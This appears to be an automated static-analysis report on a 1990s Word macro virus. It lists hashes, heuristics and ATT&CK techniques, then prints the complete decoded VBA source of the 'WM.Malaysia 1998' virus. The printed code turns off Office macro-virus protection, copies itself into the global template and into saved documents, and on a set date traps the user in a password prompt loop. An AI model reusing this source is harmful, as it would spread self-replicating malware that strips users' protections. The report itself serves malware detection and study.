Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebfdd92948c95b1a…

MALICIOUS

Office (OLE)

37.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 01ea304176ec425621a0b82c1ef1b364 SHA-1: 23b5a48acac0549a23c7ad623cb7b4ccc233e390 SHA-256: ebfdd92948c95b1a22a992176257590edd6417d4aa7be535f68da19f97bf38c7
288 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro virus markers and VBA macros, including an AutoOpen subroutine, indicating malicious intent. The 'ToolsMacro' subroutine prompts the user for a password, which is a common social engineering tactic to bypass security measures or trick users into enabling malicious content. The presence of these elements strongly suggests the document is designed to deliver a secondary payload.

Heuristics 6

  • ClamAV: Doc.Trojan.Preteced-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Preteced-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2854 bytes
SHA-256: 3a6c223e193c3bfa63744fafdc3900c51dcf19e33b81daa2d4be79d0f3934b33
Detection
ClamAV: Doc.Trojan.Proteced-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Malaysia1998"

Sub AutoExec()

Options.VirusProtection = False

End Sub

Sub AutoOpen()

On Error GoTo err
Options.SaveNormalPrompt = False
DocumentToNormal
NormalTemplate.Save
err:

End Sub

Sub FileSave()

Application.EnableCancelKey = wdCancelDisabled
Trigger
On Error GoTo err
   NormalToDocument
   ActiveDocument.Save
err:
Application.EnableCancelKey = wdCancelInterrupt

End Sub

Sub FileSaveAs()
Attribute FileSaveAs.VB_Description = "Macro recorded 04/09/98 by Ng Bing Yew"
Attribute FileSaveAs.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Macro2"

Application.EnableCancelKey = wdCancelDisabled
Trigger
On Error GoTo err
   NormalToDocument
   Dialogs(wdDialogFileSaveAs).Show
err:
Application.EnableCancelKey = wdCancelInterrupt

End Sub

Sub ToolsMacro()
   
Application.EnableCancelKey = wdCancelDisabled
   titles = "Macro Proteced"
   msg = "Please enter correct password in order to access the macro:"
   Passcode = InputBox(msg, titles)
   If Passcode = "Bad Logic" Then
      Dialogs(wdDialogToolsMacro).Show
   Else
      MsgBox ("Access denied...")
   End If
Application.EnableCancelKey = wdCancelDisabled
   
End Sub

Sub NormalToDocument()

On Error GoTo err
   cur_doc = ActiveDocument.FullName
   global_temp = NormalTemplate.FullName
   macroname = "Malaysia1998"
   Application.OrganizerCopy Source:=global_temp, _
   Destination:=cur_doc, Name:=macroname, _
   Object:=wdOrganizerObjectProjectItems
err:

End Sub

Sub DocumentToNormal()

On Error GoTo err
   cur_doc = ActiveDocument.FullName
   global_temp = NormalTemplate.FullName
   macroname = "Malaysia1998"
   Application.OrganizerCopy Source:=cur_doc, _
                             Destination:=global_temp, _
                             Name:=macroname, _
                             Object:=wdOrganizerObjectProjectItems
err:
   
End Sub

Sub Trigger()

On Error GoTo err
   Todaydate = Date
   If (Month(Todaydate) = 8) And (Day(Todaydate) = 30) Then
       Do
         cr = Chr(13) + Chr(10)
         titles = "WM.MALAYSIA 1998"
         msg1 = "You are lucky!!! You have met WM.MALAYSIA 1998!!!" + cr
         msg2 = "WM.MALAYSIA 1998 is Malaysian's first MACRO VIRUS." + cr
         msg3 = "It is written by a young college student -- BAD LOGIC." + cr
         msg4 = cr + cr + cr + cr + "Please ENTER CORRECT password: "
         msg = msg1 + msg2 + msg3 + msg4
         response = InputBox(msg, titles)
       Loop While (response <> "WM.MALAYSIA 1998")
    End If
err:

End Sub